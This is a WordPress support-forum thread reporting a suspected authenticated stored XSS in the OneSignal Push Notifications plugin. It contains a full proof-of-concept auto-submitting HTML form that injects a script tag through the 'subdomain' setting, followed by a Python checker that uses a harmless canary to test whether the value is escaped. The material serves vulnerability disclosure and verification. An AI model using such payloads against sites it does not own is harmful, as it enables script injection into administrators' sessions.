• Resolved Sakthivel

    (@saravanankanagaraj)


    We have been utilizing the OneSignal Push Notifications plugin (version 2.4, the latest release) to send blog notifications to our customers' browsers. However, we have recently received a report from one of our customers regarding a potential post-based stored XSS vulnerability within the plugin.

    As a precautionary measure, I have temporarily deactivated the plugin to mitigate any potential risks. We kindly request your assistance in verifying whether the current version of the OneSignal Push Notifications plugin is affected by this post-based stored XSS vulnerability.

    We greatly appreciate your prompt attention to this matter and look forward to receiving your guidance on the issue. If any further information is required, please do not hesitate to reach out to me.


    Description:

    The application suffers from an authenticated stored XSS via a POST request.

    The issue is triggered when input passed via the POST parameter 'subdomain' is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site.


    Steps to Reproduce:

    1. Navigate to https://127.0.0.1/wp-admin/admin.php?page=onesignal-push

    2. Login with your credentials

    3. Parameter subdomain= is vulnerable to authenticated post-based stored XSS
    <html>
      <body>
      <script>history.pushState('', 'SHPA', '/')</script>
        <form action="https://127.0.0.1/wp-admin/admin.php?page=onesignal-push" method="POST">
          <input type="hidden" name="onesignal_config_page_nonce" value="f70a4f" />
          <input type="hidden" name="_wp_http_referer" value="/wp-admin/admin.php?page=onesignal-push" />
          <input type="hidden" name="app_id" value="14d99ab2-fc9d-1337-bc1" />
          <input type="hidden" name="app_rest_api_key" value="M2IzZDA4MzItZl" />
          <input type="hidden" name="subdomain" value=""><script>confirm(251)</script>" />
          <input type="hidden" name="safari_web_id" value="" />
          <input type="hidden" name="showNotificationIconFromPostThumbnail" value="true" />
          <input type="hidden" name="showNotificationImageFromPostThumbnail" value="true" />
          <input type="hidden" name="persist_notifications" value="platform-default" />
          <input type="hidden" name="notification_title" value="hACKME" />
          <input type="hidden" name="notifyButton_enable" value="true" />
          <input type="hidden" name="notifyButton_showAfterSubscribed" value="true" />
          <input type="hidden" name="notifyButton_prenotify" value="true" />
          <input type="hidden" name="notifyButton_showcredit" value="true" />
          <input type="hidden" name="notifyButton_customize_enable" value="true" />
          <input type="hidden" name="notifyButton_size" value="medium" />
          <input type="hidden" name="notifyButton_position" value="bottom-right" />
          <input type="hidden" name="notifyButton_theme" value="default" />
          <input type="hidden" name="notifyButton_offset_bottom" value="" />
          <input type="hidden" name="notifyButton_offset_left" value="" />
          <input type="hidden" name="notifyButton_offset_right" value="" />
          <input type="hidden" name="notifyButton_color_background" value="" />
          <input type="hidden" name="notifyButton_color_foreground" value="" />
          <input type="hidden" name="notifyButton_color_badge_background" value="" />
          <input type="hidden" name="notifyButton_color_badge_foreground" value="" />
          <input type="hidden" name="notifyButton_color_badge_border" value="" />
          <input type="hidden" name="notifyButton_color_pulse" value="" />
          <input type="hidden" name="notifyButton_color_popup_button_background" value="" />
          <input type="hidden" name="notifyButton_color_popup_button_background_hover" value="" />
          <input type="hidden" name="notifyButton_color_popup_button_background_active" value="" />
          <input type="hidden" name="notifyButton_color_popup_button_color" value="" />
          <input type="hidden" name="notifyButton_message_prenotify" value="" />
          <input type="hidden" name="notifyButton_tip_state_unsubscribed" value="" />
          <input type="hidden" name="notifyButton_tip_state_subscribed" value="" />
          <input type="hidden" name="notifyButton_tip_state_blocked" value="" />
          <input type="hidden" name="notifyButton_message_action_subscribed" value="" />
          <input type="hidden" name="notifyButton_message_action_resubscribed" value="" />
          <input type="hidden" name="notifyButton_message_action_unsubscribed" value="" />
          <input type="hidden" name="notifyButton_dialog_main_title" value="" />
          <input type="hidden" name="notifyButton_dialog_main_button_subscribe" value="" />
          <input type="hidden" name="notifyButton_dialog_main_button_unsubscribe" value="" />
          <input type="hidden" name="notifyButton_dialog_blocked_title" value="" />
          <input type="hidden" name="notifyButton_dialog_blocked_message" value="" />
          <input type="hidden" name="prompt_customize_enable" value="true" />
          <input type="hidden" name="prompt_action_message" value="" />
          <input type="hidden" name="prompt_auto_accept_title" value="" />
          <input type="hidden" name="prompt_site_name" value="" />
          <input type="hidden" name="prompt_example_notification_title_desktop" value="" />
          <input type="hidden" name="prompt_example_notification_message_desktop" value="" />
          <input type="hidden" name="prompt_example_notification_title_mobile" value="" />
          <input type="hidden" name="prompt_example_notification_message_mobile" value="" />
          <input type="hidden" name="prompt_example_notification_caption" value="" />
          <input type="hidden" name="prompt_accept_button_text" value="" />
          <input type="hidden" name="prompt_cancel_button_text" value="" />
          <input type="hidden" name="send_welcome_notification" value="true" />
          <input type="hidden" name="welcome_notification_title" value="" />
          <input type="hidden" name="welcome_notification_message" value="" />
          <input type="hidden" name="welcome_notification_url" value="" />
          <input type="hidden" name="notification_on_post" value="true" />
          <input type="hidden" name="utm_additional_url_params" value="" />
          <input type="hidden" name="allowed_custom_post_types" value="" />
          <input type="hidden" name="custom_manifest_url" value="" />
          <input type="hidden" name="show_notification_send_status_message" value="true" />
          <input type="submit" value="Send" />
        </form>
      </body>
    </html>

    Impact:

    post-based stored XSS vulnerability
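The post asks how to verify whether a given install is affected. The usual way to answer that without running the reporter's confirm() payload is to submit a harmless, unique canary through the same 'subdomain' field and then inspect the settings page the plugin renders back: if the canary ends up inside a real script element, the value was written into the attribute without escaping; if it only appears as the (decoded) text of the value attribute, the plugin escaped it. The following is an added example, not code from the original post or from the OneSignal plugin; the field names are taken from the PoC form above, the nonce and API values are assumed to be copied from a logged-in admin's live page, and the two sample responses are constructed here for an offline run.

```python
"""Offline check for unescaped reflection of the 'subdomain' setting.

Added example (not from the original post or the OneSignal plugin). Workflow:
  1. build_payload() -> POST body for admin.php?page=onesignal-push, using a
     harmless canary instead of the reporter's confirm(251) payload;
  2. save the HTML the settings page renders after the POST (as an admin);
  3. classify_response() on that HTML tells you whether the value broke out
     of the attribute (vulnerable) or was escaped.
Only the nonce/app fields are assumed; every other field mirrors the PoC form.
"""
from html.parser import HTMLParser
import secrets

CANARY_PREFIX = "xsscheck"


def make_canary() -> str:
    """Unique, alphanumeric marker so a match cannot come from page furniture."""
    return CANARY_PREFIX + secrets.token_hex(4)


def build_payload(canary: str, nonce: str, app_id: str = "", rest_key: str = "") -> dict:
    """POST body mirroring the PoC form; the nonce must come from the live admin page.

    Fields the PoC leaves empty are omitted here for brevity; add them with ""
    values if the plugin rejects a partial submission (assumption).
    """
    return {
        "onesignal_config_page_nonce": nonce,
        "_wp_http_referer": "/wp-admin/admin.php?page=onesignal-push",
        "app_id": app_id,
        "app_rest_api_key": rest_key,
        # same attribute-breakout shape as the PoC, but the script body is inert
        "subdomain": f'"><script>{canary}</script>',
        "persist_notifications": "platform-default",
        "notifyButton_enable": "true",
    }


class _BreakoutDetector(HTMLParser):
    """Tracks where the canary lands in the parsed page."""

    def __init__(self, canary: str):
        super().__init__()  # convert_charrefs=True: attribute entities are decoded
        self.canary = canary
        self.in_script = False
        self.script_breakout = False   # canary became script content
        self.escaped_in_attr = False   # canary stayed inside an attribute value

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True
        for _, val in attrs:
            if val and self.canary in val:
                self.escaped_in_attr = True

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        if self.in_script and self.canary in data:
            self.script_breakout = True


def classify_response(html_text: str, canary: str) -> str:
    """'vulnerable' if the canary is script content, 'escaped' if it is only an
    attribute value, 'not-reflected' if it does not appear at all."""
    p = _BreakoutDetector(canary)
    p.feed(html_text)
    p.close()
    if p.script_breakout:
        return "vulnerable"
    if p.escaped_in_attr:
        return "escaped"
    return "not-reflected"


# Constructed sample responses (not captured from a real site) for an offline run.
SAMPLE_CANARY = "xsscheckdeadbeef"
SAMPLE_VULNERABLE = (
    '<input type="text" name="subdomain" value="">'
    '<script>xsscheckdeadbeef</script>" />'
)
SAMPLE_ESCAPED = (
    '<input type="text" name="subdomain" '
    'value="&quot;&gt;&lt;script&gt;xsscheckdeadbeef&lt;/script&gt;" />'
)

if __name__ == "__main__":
    print("payload field:", build_payload(SAMPLE_CANARY, nonce="<nonce-from-live-page>")["subdomain"])
    for label, body in (("unescaped", SAMPLE_VULNERABLE), ("escaped", SAMPLE_ESCAPED)):
        print(f"{label:>9}: {classify_response(body, SAMPLE_CANARY)}")
```

Run it against a saved copy of the settings page (and, since the report calls this stored XSS, against a fresh load of the page after the POST, not only the immediate response). An 'escaped' result means the plugin runs the value through an attribute escaper such as esc_attr() before rendering; a 'vulnerable' result reproduces the report. Send the canary only to a test install you own, and remember the PoC still needs the admin's nonce and session, so the realistic attack path is an administrator being tricked into submitting the form.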

  • The topic ‘check Post-based stored XSS vulnerability in OneSignal Push Notifications Plugin’ is closed to new replies.